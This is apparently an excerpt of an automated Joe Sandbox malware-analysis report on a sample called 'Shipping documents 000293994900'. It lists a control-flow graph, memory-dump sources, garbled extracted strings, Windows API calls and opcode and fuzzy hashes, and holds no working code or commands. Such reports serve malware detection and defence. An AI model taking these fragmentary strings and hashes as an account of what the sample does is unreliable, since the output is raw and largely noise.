                                                control_flow_graph 1909 388d4c68-388d4c8c 1910 388d4c8e-388d4c91 1909->1910 1911 388d4c93-388d4cad 1910->1911 1912 388d4cb2-388d4cb5 1910->1912 1911->1912 1913 388d4cbb-388d4db3 1912->1913 1914 388d5394-388d5396 1912->1914 1932 388d4db9-388d4e06 call 388d5511 1913->1932 1933 388d4e36-388d4e3d 1913->1933 1915 388d539d-388d53a0 1914->1915 1916 388d5398 1914->1916 1915->1910 1918 388d53a6-388d53b3 1915->1918 1916->1915 1946 388d4e0c-388d4e28 1932->1946 1934 388d4ec1-388d4eca 1933->1934 1935 388d4e43-388d4eb3 1933->1935 1934->1918 1952 388d4ebe 1935->1952 1953 388d4eb5 1935->1953 1950 388d4e2a 1946->1950 1951 388d4e33-388d4e34 1946->1951 1950->1951 1951->1933 1952->1934 1953->1952
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: fbq$XPbq$\Obq
                                                • API String ID: 0-4057264190
                                                • Opcode ID: 292945836a1c32994bb43390a0b5eb31f4d6765c1d160f808ffc2038185b4979
                                                • Instruction ID: ab887a206bed2b26333c3c23b6fda711336df238724100f0b2471454e26614c5
                                                • Opcode Fuzzy Hash: 292945836a1c32994bb43390a0b5eb31f4d6765c1d160f808ffc2038185b4979
                                                • Instruction Fuzzy Hash: DE617F30E002199FEB149FA5C8557AEBBF6FF88310F20852AE105AB395DB758D468F91
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PH]q$`Ay5
                                                • API String ID: 0-976110911
                                                • Opcode ID: 9f4d72260317344f58072843ffc46c0aa4fae40cd6c921e193288453c3038f7e
                                                • Instruction ID: aeb860d3f9c1ec20c88e94c33163728bd853ba7f403c01c87e065092d1a602e5
                                                • Opcode Fuzzy Hash: 9f4d72260317344f58072843ffc46c0aa4fae40cd6c921e193288453c3038f7e
                                                • Instruction Fuzzy Hash: 2F71C031B002059FDB18AF68E8906AEB7A3FB88310F248579D406EB385DB35DD57CB91
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $]q$$]q
                                                • API String ID: 0-127220927
                                                • Opcode ID: ab2b6076a5d7620ca4bdd599deeaefccd3f0eeb1bb172572a82b08bbd412781a
                                                • Instruction ID: e1771594097d22a8a73615168205b2f231d64c9654ef3da1ff5f4b4e35d3abab
                                                • Opcode Fuzzy Hash: ab2b6076a5d7620ca4bdd599deeaefccd3f0eeb1bb172572a82b08bbd412781a
                                                • Instruction Fuzzy Hash: FC513E74B002059FDB55DF78C850B6EB3F7EB88744F508569C919EB395EA30AC078B92
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: fbq$XPbq
                                                • API String ID: 0-2292610095
                                                • Opcode ID: 6043ce71b20a931aa6df61f31f62938ac6a2064cc77e10065dc54a484b83367d
                                                • Instruction ID: fd6fb89b24c4e6fdb9c1eb2181711cdf76f25119371278c24072ca42f5b40173
                                                • Opcode Fuzzy Hash: 6043ce71b20a931aa6df61f31f62938ac6a2064cc77e10065dc54a484b83367d
                                                • Instruction Fuzzy Hash: EB516E70F002099FEB149FA5C855BAEBBF6FF88700F208529E105AB395DB758D468F91
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $$,Rv5PRv5`Ay5
                                                • API String ID: 0-1665853859
                                                • Opcode ID: 136ec9ab5b45baeb392469e3e4c27a405b949511fdf05b37e7e1a85861e079c0
                                                • Instruction ID: 9819114a53308e8839a706f75c0a1641a9e0fc8389eca12d28bb2b2061da7715
                                                • Opcode Fuzzy Hash: 136ec9ab5b45baeb392469e3e4c27a405b949511fdf05b37e7e1a85861e079c0
                                                • Instruction Fuzzy Hash: 4F318171E0020A9BDB09CF64D89069EF7B2FF8A304F54C629E815FB240DB709C96CB81
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 37FED902
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3324753257.0000000037FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_37fe0000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: fba12d948406bd1dea22724a58683ef7d3e70a7ecf45dd52263d2a90dd28a92d
                                                • Instruction ID: aaf012736a9263a84bd8f9af14768cc47f550a085f2b4f0be949ecce7bd912b1
                                                • Opcode Fuzzy Hash: fba12d948406bd1dea22724a58683ef7d3e70a7ecf45dd52263d2a90dd28a92d
                                                • Instruction Fuzzy Hash: EC51D2B5C00349DFDB14CF9AC884ADEBFB5BF48354F24852AE419AB210D775A985CF90
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 37FED902
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3324753257.0000000037FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_37fe0000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: 7d8757d7348c9bd5ff3d0b7a3fb31b85706785a402a2b7921e5d100bb23f0e87
                                                • Instruction ID: c8969c9237016b36fada912951e501ae490e6ee24aebf014a1468722e92462a9
                                                • Opcode Fuzzy Hash: 7d8757d7348c9bd5ff3d0b7a3fb31b85706785a402a2b7921e5d100bb23f0e87
                                                • Instruction Fuzzy Hash: F541BFB1D00309DFDB14CF9AC884ADEBBB5BF48310F64852AE819AB250D775A985CF91
                                                APIs
                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 38CA0101
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3325209083.0000000038CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38ca0000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: CallProcWindow
                                                • String ID:
                                                • API String ID: 2714655100-0
                                                • Opcode ID: 52d56f2a3224afa32949bc44ed2101f935fc0cef4d3daae2a79808684586536a
                                                • Instruction ID: 42b907655c64762e4f0f72c61833d72822c3652e4e1631f43e93817a9c05525f
                                                • Opcode Fuzzy Hash: 52d56f2a3224afa32949bc44ed2101f935fc0cef4d3daae2a79808684586536a
                                                • Instruction Fuzzy Hash: B9411AB8A00305CFDB04CF99C888A9ABBF5FF89314F24C459D519A7321D779A841CFA0
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 37FE34DF
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3324753257.0000000037FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_37fe0000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 519088b1cbf0590ec4b584599eb050591b3b078c73b643d2de4b50cc083712ab
                                                • Instruction ID: 31cd7b55fef633e05fbe7b975d66094d72d71e48e7ea92b84084222d9e48404e
                                                • Opcode Fuzzy Hash: 519088b1cbf0590ec4b584599eb050591b3b078c73b643d2de4b50cc083712ab
                                                • Instruction Fuzzy Hash: 1521E5B5900209AFDB10CFAAD984ADEBBF9FF48310F14841AE915A7210D379A950CFA5
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 37FE34DF
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3324753257.0000000037FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_37fe0000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 6ab8128baa819aaee27e1e12cba700083ac4cabbb6a0b3adaba4a66a458f7a18
                                                • Instruction ID: a79984710457d9973099c663c989d6fc8bff3b7ac3a2d7cd63ce0e15a774bc77
                                                • Opcode Fuzzy Hash: 6ab8128baa819aaee27e1e12cba700083ac4cabbb6a0b3adaba4a66a458f7a18
                                                • Instruction Fuzzy Hash: D221C4B59002499FDB10CFAAD984ADEBBF9FF48310F14841AE919A7350D379A940CFA5
                                                APIs
                                                • OleInitialize.OLE32(00000000), ref: 38CA25CD
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3325209083.0000000038CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38ca0000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: Initialize
                                                • String ID:
                                                • API String ID: 2538663250-0
                                                • Opcode ID: 0470d9e33b627a00a06d7ea111e1699906f61d2bb2ac12aeaebf8b7419ec6c85
                                                • Instruction ID: 65e1c35b9d5b81581d42715e469667d20d191c859ebbb3faa469c56a471522ca
                                                • Opcode Fuzzy Hash: 0470d9e33b627a00a06d7ea111e1699906f61d2bb2ac12aeaebf8b7419ec6c85
                                                • Instruction Fuzzy Hash: FD1130B48002498FCB20DFAAD484BDEBFF4AB48314F20845AD459A3210C379A984CFA4
                                                APIs
                                                • OleInitialize.OLE32(00000000), ref: 38CA25CD
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3325209083.0000000038CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38ca0000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: Initialize
                                                • String ID:
                                                • API String ID: 2538663250-0
                                                • Opcode ID: 1c6dd314ac9b790950b8aa89ccd963488f468ef17b6443bc6a117de3adefe1a3
                                                • Instruction ID: 68d3349a383d7c73ebff7d9f893a3df14438ca82fa10a85d7cb56f487271ebe1
                                                • Opcode Fuzzy Hash: 1c6dd314ac9b790950b8aa89ccd963488f468ef17b6443bc6a117de3adefe1a3
                                                • Instruction Fuzzy Hash: D51112B59047498FCB20DFAAD584B9EBBF4FB48320F20845AE559A7310D379A940CFA5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LR]q
                                                • API String ID: 0-3081347316
                                                • Opcode ID: 1e1273a61e8e6674d382d620a1db9d69e9a45f0d101237946be4519e2ff4a784
                                                • Instruction ID: a2862eabbee37b986e1224a99b1ab12da0e58d42594186c8bc2a1b6be3b708f9
                                                • Opcode Fuzzy Hash: 1e1273a61e8e6674d382d620a1db9d69e9a45f0d101237946be4519e2ff4a784
                                                • Instruction Fuzzy Hash: 64318170E142199FEF15CBA5CC507AEBBB1FF95308F20886AE406EB280E7759C56CB41
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PH]q
                                                • API String ID: 0-3168235125
                                                • Opcode ID: 28f12188a2ce1f700012c99ba6bf694db512ce9bd7e54a83cf1d49d7040bbcfc
                                                • Instruction ID: a5bf5d6cf736458d3f633cd7150c9b219581311f15a405d0f855c59e664858d0
                                                • Opcode Fuzzy Hash: 28f12188a2ce1f700012c99ba6bf694db512ce9bd7e54a83cf1d49d7040bbcfc
                                                • Instruction Fuzzy Hash: 2741A070A00309DFEB05DF75C85469EBBB6FF85384F208929D405EB350EBB4994ACB91
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PH]q
                                                • API String ID: 0-3168235125
                                                • Opcode ID: 7287d4f83a92cedef9328cdd50ce3513a7b17e4aac4193ad38ef9cf09d25271b
                                                • Instruction ID: 2528c75620c8f4a08f96293768b0edb768d486ecb9fd6be7740e0fc5360e64fd
                                                • Opcode Fuzzy Hash: 7287d4f83a92cedef9328cdd50ce3513a7b17e4aac4193ad38ef9cf09d25271b
                                                • Instruction Fuzzy Hash: FA319C30B002059FDB18AB78A9246AE77A6AF89310F20893CD406EB395DF35DD16CB95
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PH]q
                                                • API String ID: 0-3168235125
                                                • Opcode ID: 394db5db6829a9e31e34fcd79a0171ef9e6e9e987bf9d40d14a928706683fef6
                                                • Instruction ID: 2f5c0104b648bd4423fadd6416683e6474e810e0b70015357608a13f8bb10dc3
                                                • Opcode Fuzzy Hash: 394db5db6829a9e31e34fcd79a0171ef9e6e9e987bf9d40d14a928706683fef6
                                                • Instruction Fuzzy Hash: 9C31B230700205CFDB09AB74C55466F77A7AF89240F508578D406DB395DF35ED0ACBA5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LR]q
                                                • API String ID: 0-3081347316
                                                • Opcode ID: 162d5ed654bfbab4c0ab14640fd8f9b1454138f38d4dfc35c882c5fdc5c80f7d
                                                • Instruction ID: 4d413fa7f62c7dd8114f48f9053c0fbb8de45137f95e91427a9c6c4c798fc8b5
                                                • Opcode Fuzzy Hash: 162d5ed654bfbab4c0ab14640fd8f9b1454138f38d4dfc35c882c5fdc5c80f7d
                                                • Instruction Fuzzy Hash: F2318270E142199FDF24CBA5CC447AEBBB1FF85318F20886AE415EB280E7759C96CB41
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PRv5`Ay5
                                                • API String ID: 0-3536067443
                                                • Opcode ID: 58fe89bfee818d9ba16233b618187ef16b7d1341e0af86fe5ac9b8b18152550f
                                                • Instruction ID: 9acbc38ad2e79214e9a05798a680c1db39a9de10cfec86c7a43bb11342441f70
                                                • Opcode Fuzzy Hash: 58fe89bfee818d9ba16233b618187ef16b7d1341e0af86fe5ac9b8b18152550f
                                                • Instruction Fuzzy Hash: 35316D74A10209DBDB08CF75C85469EB7B2AF89304F10CA29E916EB750DB34BC4BCB50
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: d
                                                • API String ID: 0-2564639436
                                                • Opcode ID: 9c8c9acd41cf97313fbc990fdd2fdfdaa6f2be2be25c0f3057ba3d80f665983c
                                                • Instruction ID: 0d34db74aaf170ae2af6e8ea72ae462730f8fa31edd15cc95387ab8281119758
                                                • Opcode Fuzzy Hash: 9c8c9acd41cf97313fbc990fdd2fdfdaa6f2be2be25c0f3057ba3d80f665983c
                                                • Instruction Fuzzy Hash: E641E2B09007499FDB14CFA9C984ADEBFF5FF48314F148029E809AB254DB75A945CB90
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PRv5`Ay5
                                                • API String ID: 0-3536067443
                                                • Opcode ID: 6c670d086599763b7b8449781dda47528074f9f0d7ce429a6c7b309162936c6e
                                                • Instruction ID: 2fcd3c377fb102f55226859820ad2217218a798144adbd1ff75d223700c0851f
                                                • Opcode Fuzzy Hash: 6c670d086599763b7b8449781dda47528074f9f0d7ce429a6c7b309162936c6e
                                                • Instruction Fuzzy Hash: A3315A74A10209DFDB09CF75C854A9EB7B2AF89304F10C629E91AEB750DB75BC4ACB50
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ,Rv5PRv5`Ay5
                                                • API String ID: 0-1848344747
                                                • Opcode ID: 37fca9181565a867cf47de4373fb10b2d5c2ced7b78a9326186b6b8eaed115aa
                                                • Instruction ID: 0f2cee54fbe323b8ec6da98749e31dc7fcf4b5818d3fe6c6e6ec303c28b3d03d
                                                • Opcode Fuzzy Hash: 37fca9181565a867cf47de4373fb10b2d5c2ced7b78a9326186b6b8eaed115aa
                                                • Instruction Fuzzy Hash: 4D217171E0020A9BDB09CF64C85069EF7B2FF8A304F54C629E915FB241DB70AC96CB91
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: T
                                                • API String ID: 0-3187964512
                                                • Opcode ID: abab4712eac2f1ba09c2e52c840033c06dd0c25553b2c0dd889485689b38f073
                                                • Instruction ID: fd7c62e7662040d00e76615fb7189638c5e8506ddfb39af376eb5ef42dfaa3a2
                                                • Opcode Fuzzy Hash: abab4712eac2f1ba09c2e52c840033c06dd0c25553b2c0dd889485689b38f073
                                                • Instruction Fuzzy Hash: 7D218B30A04244AFDB14DB38CD657AE77F2AF89309F1404ADE402EB3A0DB758C51CB91
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: |
                                                • API String ID: 0-2343686810
                                                • Opcode ID: e2a43f5ca5c73ec9a003650f93238a3c2bffe59756eb4c893daa7159e248e93f
                                                • Instruction ID: cd2ed79f353d875efb561e4426220a0ac276403ac08dfea217720589612d3222
                                                • Opcode Fuzzy Hash: e2a43f5ca5c73ec9a003650f93238a3c2bffe59756eb4c893daa7159e248e93f
                                                • Instruction Fuzzy Hash: 8A11AFB0F402149FDB44DB788805B9EB7F5AF4C700F008469E50AEB390EB359C018B80
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: t!s5
                                                • API String ID: 0-2922850838
                                                • Opcode ID: cd625a31e14b92a881f35279783cabffe26f0685d266208a9ba7f0a3c4eb008b
                                                • Instruction ID: 47cdf0c77e335d7b1a95049f07f2c13eca9bb1a4b8aac36e7ae99540627437d0
                                                • Opcode Fuzzy Hash: cd625a31e14b92a881f35279783cabffe26f0685d266208a9ba7f0a3c4eb008b
                                                • Instruction Fuzzy Hash: AF118C30F002048FEF66DB79DD1472B329AEB89325F60497AE546DB291DB24CDA18BD1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: |
                                                • API String ID: 0-2343686810
                                                • Opcode ID: 1f16dcede9a9c77728614903f8a7161e6b65b211becadccecb008e571e5394fd
                                                • Instruction ID: dd044440745fbb250deb41605930a79de12f747e0e127b24ae2b9adcd77d0fed
                                                • Opcode Fuzzy Hash: 1f16dcede9a9c77728614903f8a7161e6b65b211becadccecb008e571e5394fd
                                                • Instruction Fuzzy Hash: A2115B74F002159FDB54AB78C805B6EB7F1AF4C704F14846AE50AE73A0EB399D018B81
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LR]q
                                                • API String ID: 0-3081347316
                                                • Opcode ID: 82cbb46301b2013edd67b32fbf68687edb3518b1923d2a1ebf7b1fff29d9c32b
                                                • Instruction ID: b2b54632e565c9a28ab950fc3dda433980cd4e6dc6868932c33f8d4818543ae7
                                                • Opcode Fuzzy Hash: 82cbb46301b2013edd67b32fbf68687edb3518b1923d2a1ebf7b1fff29d9c32b
                                                • Instruction Fuzzy Hash: 5D11C2317092449FC7169B38942069D7BF6AF86704B1444ABE445CB392DE758C49CB92
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $]q
                                                • API String ID: 0-1007455737
                                                • Opcode ID: 57abc324e7e01a8c89c55f412a7de28fe420882f9b3c138e61ac3aef606c0969
                                                • Instruction ID: f46a8ebe73d7fb67b1054ca5a659277b766fa65b44362ab879f0dfbfc7f01f5a
                                                • Opcode Fuzzy Hash: 57abc324e7e01a8c89c55f412a7de28fe420882f9b3c138e61ac3aef606c0969
                                                • Instruction Fuzzy Hash: EDF0AF76700206CFEF188E69E9816AD73A6EB48394F914C36D908D7762CA31D90BC790
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 84e9b95cf1c707e6c84b93c54bb2583c7c1a7d0c354d499f49dbd1e7af83bbc1
                                                • Instruction ID: 185b06d0803e524200d80f1e05dcb8d6153e519ec5d92a0a31ab84e28524ae03
                                                • Opcode Fuzzy Hash: 84e9b95cf1c707e6c84b93c54bb2583c7c1a7d0c354d499f49dbd1e7af83bbc1
                                                • Instruction Fuzzy Hash: 05125030700105ABCB19AB38E85566873A7EBC9349B508A3EE405DB766CFB5DC87DB81
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6034c4cf870e6abcbe538e8b872abee9272c4a4da36987cd8e9f1aa24d25abe7
                                                • Instruction ID: 939686077d5b4fff3403ba2ad627867c1ab66da0a5f16bbc35650b004225f5c2
                                                • Opcode Fuzzy Hash: 6034c4cf870e6abcbe538e8b872abee9272c4a4da36987cd8e9f1aa24d25abe7
                                                • Instruction Fuzzy Hash: E8B14B70E00209CFDF14CFA9D9957EDBBF1AF88714F248129D819A7294EB7498A5CB81
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 309d41373ba10337cfefd3593c8fc3c9fcc30b9c4f8cc44bbaaa35315ebfb227
                                                • Instruction ID: 5b9ee83fa78a04b551410a1277d2ef7c3ecfac70f83a2479fb10526c85d8448a
                                                • Opcode Fuzzy Hash: 309d41373ba10337cfefd3593c8fc3c9fcc30b9c4f8cc44bbaaa35315ebfb227
                                                • Instruction Fuzzy Hash: A491C270B002169FDB15CF28CC80A2AB7B6FF95314F2586A6D419DB296CB35EC93C791
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 420a7f5de191e740d8edfdf68573b91601b89d85c01c606e3ee30209930a7b0c
                                                • Instruction ID: 0a381205220d3b1c405d5039db53e782a1e01717a40761105369151531f6f733
                                                • Opcode Fuzzy Hash: 420a7f5de191e740d8edfdf68573b91601b89d85c01c606e3ee30209930a7b0c
                                                • Instruction Fuzzy Hash: 4D917E70E00209DFDF14CFA9DD857EEBBF2AF88304F248129E415A7294EB749995CB91
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 19f57c0bb7dfec068fc0ad02ab417088e4af7699de00827fc4ab22be4739e7cb
                                                • Instruction ID: 8f6a6fd6f1433f0e49bf648690bd28e8d9af46c4f6594a4277c23a840a74c8e5
                                                • Opcode Fuzzy Hash: 19f57c0bb7dfec068fc0ad02ab417088e4af7699de00827fc4ab22be4739e7cb
                                                • Instruction Fuzzy Hash: E5619E72F001228FDB14AE7EC88065FBADBAF94260B154079D80EDB365DE79ED0687D1
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 012d91cc94340897d943852087fcf82312facc241680838a8ac051abe9fdc58b
                                                • Instruction ID: 758f407ff671c72315955f8daae086a45646bda31b2214dc16760bb69b1db5ba
                                                • Opcode Fuzzy Hash: 012d91cc94340897d943852087fcf82312facc241680838a8ac051abe9fdc58b
                                                • Instruction Fuzzy Hash: 53912D34E00219CFEB10DF68C890B8DB7B1FF89314F208699D549BB295DB70AA86CF51
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
